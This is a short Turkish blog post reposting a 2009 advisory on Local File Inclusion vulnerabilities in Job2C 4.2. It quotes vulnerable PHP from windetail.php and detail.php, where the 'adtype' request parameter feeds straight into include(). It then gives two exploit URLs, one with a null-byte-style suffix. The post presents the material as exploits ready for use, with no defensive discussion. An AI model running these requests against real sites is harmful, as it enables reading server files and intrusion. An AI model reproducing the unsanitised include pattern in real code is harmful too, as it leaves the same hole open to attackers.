"Şeytan İçinde ki Sestir; O Sese Kulak Ver"

-Zorlu BUĞRAHAN-

15 Nisan 2009 Çarşamba

Job2C 4.2 (adtype) Multiple Local File Inclusion Vulnerabilities

kaynak: http://www.milw0rm.com/exploits/8443

kaynak: http://www.yildirimordulari.com/showthread.php?t=5228



file:

windetail.php

err0r c0de:

$adtype=$_REQUEST["adtype"];
$id=$_REQUEST["id"]; ( err0r c0de 1 )
$title=$_REQUEST["title"];

winHead($title);
include("lib/".$adtype.".inc"); ( err0r c0de 2 )

exp 1:

yildirimordulari.com/script/windetail.php?adtype=LFi

file:

detail.php

err0r c0de:

$mode=$_REQUEST["mode"];
$adtype=$_REQUEST["adtype"]; ( err0r c0de 1 )
$id=$_REQUEST["id"];
$auth=$_SESSION["auth"];
include("conf/conf.inc");
include("lib/lib.inc");
include("lib/addlib.inc");
include("templates/header.inc");
if(!$adtype)$adtype="res";

include("lib/".$adtype.".inc"); ( err0r c0de 1 )


exp 2:

yildirimordulari.com/script/detail.php?adtype=LFi00

0 yorum:

 
Dizi